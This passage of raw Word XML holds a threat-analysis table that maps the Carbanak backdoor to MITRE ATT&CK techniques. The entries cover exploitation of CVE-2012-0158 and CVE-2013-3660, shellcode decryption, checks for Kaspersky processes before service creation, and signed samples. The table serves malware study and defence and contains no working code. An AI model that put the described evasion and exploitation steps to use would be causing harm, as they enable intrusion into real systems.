                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B23A0C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B23A0C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B23A0C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52C304B9" w14:textId="07914DDF" w:rsidR="00B707D9" w:rsidRPr="00B23A0C" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B23A0C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B23A0C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1203 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B23A0C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Exploitation for Client Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E9904BA" w14:textId="6C65135D" w:rsidR="00B707D9" w:rsidRPr="00B23A0C" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B23A0C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B2CEB7D" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="00B23A0C" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07D56480" w14:textId="0ABB63E9" w:rsidR="00B707D9" w:rsidRPr="00B23A0C" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1177" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F570D0A" w14:textId="26187E4D" w:rsidR="00B707D9" w:rsidRPr="00B23A0C" w:rsidRDefault="00137B83" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3152" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="799C1EAF" w14:textId="0DD6210E" w:rsidR="00B707D9" w:rsidRPr="00B23A0C" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00B23A0C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>The user tricked into execution (CVE-2012-0158 allow remote attackers to execute arbitrary code)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00137B83" w:rsidRPr="003E52D1" w14:paraId="72711711" w14:textId="77777777" w:rsidTr="00BC3894">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7934DC80" w14:textId="0EDC5571" w:rsidR="00137B83" w:rsidRDefault="00137B83" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1497" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BFC16CD" w14:textId="1B673089" w:rsidR="00137B83" w:rsidRDefault="00137B83" w:rsidP="00B707D9">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40" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1103C3DE" w14:textId="099B1666" w:rsidR="00137B83" w:rsidRPr="00791CB5" w:rsidRDefault="00137B83" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1140 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00137B83">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00137B83">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="587DC5D5" w14:textId="1DB6F391" w:rsidR="00137B83" w:rsidRDefault="00137B83" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C1B6055" w14:textId="77777777" w:rsidR="00137B83" w:rsidRPr="003E52D1" w:rsidRDefault="00137B83" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="714B828E" w14:textId="7754E4D9" w:rsidR="00137B83" w:rsidRDefault="00137B83" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1177" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78DC6E27" w14:textId="4567AD97" w:rsidR="00137B83" w:rsidRPr="003E52D1" w:rsidRDefault="00670455" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3152" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DC42D96" w14:textId="77777777" w:rsidR="00137B83" w:rsidRDefault="00137B83" w:rsidP="00137B83">
            <w:r>
              <w:t xml:space="preserve">[1] Once the vulnerability is successfully exploited, the shellcode decrypts </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B7AD603" w14:textId="0A1589D2" w:rsidR="00137B83" w:rsidRDefault="00137B83" w:rsidP="00137B83">
            <w:r>
              <w:t xml:space="preserve">and executes the backdoor known as </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Carbanak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B707D9" w:rsidRPr="003E52D1" w14:paraId="3690C62E" w14:textId="77777777" w:rsidTr="00BC3894">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A3C4CEB" w14:textId="28051677" w:rsidR="00B707D9" w:rsidRDefault="00AB5764" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1497" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="065FB77B" w14:textId="13984E06" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">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40" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="210E9093" w14:textId="3848A457" w:rsidR="00B707D9" w:rsidRPr="00791CB5" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00791CB5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00791CB5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">1480 </w:t>
            </w:r>
            <w:r w:rsidR="0058741C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="0058741C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00791CB5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Execution Guardrails</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46CD154B" w14:textId="76BA89BB" w:rsidR="00B707D9" w:rsidRDefault="00913148" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DC784E4" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D57B9EC" w14:textId="56FDE2AF" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1177" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44B6B96F" w14:textId="0C693AED" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00670455" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3152" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30F4B356" w14:textId="6903F590" w:rsidR="00B707D9" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:r>
              <w:t xml:space="preserve">[1] Before creating the malicious service, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Carbanak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> determines if either the avp.exe or avpui.exe processes (components of Kaspersky Internet Security) </w:t>
            </w:r>
            <w:r w:rsidR="009350E2">
              <w:t>are</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> running</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D379AA" w:rsidRPr="00B54923" w14:paraId="3E671E01" w14:textId="77777777" w:rsidTr="00BC3894">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B508737" w14:textId="7FE34ECE" w:rsidR="00D379AA" w:rsidRDefault="00D379AA" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1497" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B60005B" w14:textId="02F4AED2" w:rsidR="00D379AA" w:rsidRDefault="00D379AA" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0004 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Prvilege</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CFA5F74" w14:textId="2CC0D3A3" w:rsidR="00D379AA" w:rsidRDefault="00D379AA" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1068 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D379AA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Exploitation for Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C2CA80D" w14:textId="5E8A21D5" w:rsidR="00D379AA" w:rsidRPr="00B54923" w:rsidRDefault="00913148" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6837DC6D" w14:textId="77777777" w:rsidR="00D379AA" w:rsidRPr="00B54923" w:rsidRDefault="00D379AA" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42103C68" w14:textId="7FA45627" w:rsidR="00D379AA" w:rsidRDefault="00913148" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1177" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03EA3076" w14:textId="0E697B1A" w:rsidR="00D379AA" w:rsidRDefault="00913148" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-EXP/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3152" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A2A2EEE" w14:textId="3680B986" w:rsidR="00D379AA" w:rsidRPr="00D379AA" w:rsidRDefault="00D379AA" w:rsidP="00D379AA">
            <w:pPr>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D379AA">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Carbanak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D379AA">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> will try to exploit a known vulnerability </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F571836" w14:textId="77777777" w:rsidR="00D379AA" w:rsidRPr="00D379AA" w:rsidRDefault="00D379AA" w:rsidP="00D379AA">
            <w:pPr>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D379AA">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">in Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B4893FD" w14:textId="77777777" w:rsidR="00D379AA" w:rsidRPr="00D379AA" w:rsidRDefault="00D379AA" w:rsidP="00D379AA">
            <w:pPr>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D379AA">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows 7, Windows 8, and Windows Server 2012, CVE-2013-3660, for local </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A51C7B4" w14:textId="6A62343A" w:rsidR="00D379AA" w:rsidRDefault="00D379AA" w:rsidP="00D379AA">
            <w:pPr>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D379AA">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>privilege escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00282006" w:rsidRPr="00282006" w14:paraId="7FDE6866" w14:textId="77777777" w:rsidTr="00BC3894">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="157155EE" w14:textId="234568F1" w:rsidR="00282006" w:rsidRPr="00282006" w:rsidRDefault="00282006" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00282006">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1497" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37FA477B" w14:textId="61D3B7BE" w:rsidR="00282006" w:rsidRPr="00282006" w:rsidRDefault="00282006" w:rsidP="00B707D9">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40" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1795001E" w14:textId="164B3253" w:rsidR="00282006" w:rsidRPr="00282006" w:rsidRDefault="00282006" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00282006">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1036.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00282006">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Masquerading: Invalid Code Signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A324ED9" w14:textId="5DD64862" w:rsidR="00282006" w:rsidRPr="00282006" w:rsidRDefault="00282006" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00282006">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0707AD68" w14:textId="77777777" w:rsidR="00282006" w:rsidRPr="00282006" w:rsidRDefault="00282006" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C9428B3" w14:textId="38D7998E" w:rsidR="00282006" w:rsidRPr="00282006" w:rsidRDefault="00282006" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00282006">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1177" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AEA4486" w14:textId="1FE40468" w:rsidR="00282006" w:rsidRPr="00282006" w:rsidRDefault="00282006" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3152" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BE79770" w14:textId="77777777" w:rsidR="00282006" w:rsidRPr="00282006" w:rsidRDefault="00282006" w:rsidP="00282006">
            <w:r w:rsidRPr="00282006">
              <w:t xml:space="preserve">[1] In order to render the malware less suspicious, the latest </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00282006">
              <w:t>Carbanak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00282006">
              <w:t xml:space="preserve"> samples </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3853BF4B" w14:textId="5EA9973A" w:rsidR="00282006" w:rsidRPr="00282006" w:rsidRDefault="00282006" w:rsidP="00282006">
            <w:r w:rsidRPr="00282006">
              <w:t>are digitally signed:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB5764" w:rsidRPr="00B54923" w14:paraId="6ABB2A16" w14:textId="77777777" w:rsidTr="00BC3894">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44FF9347" w14:textId="1CAF1C21" w:rsidR="00AB5764" w:rsidRPr="00B54923" w:rsidRDefault="006A5BAF" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
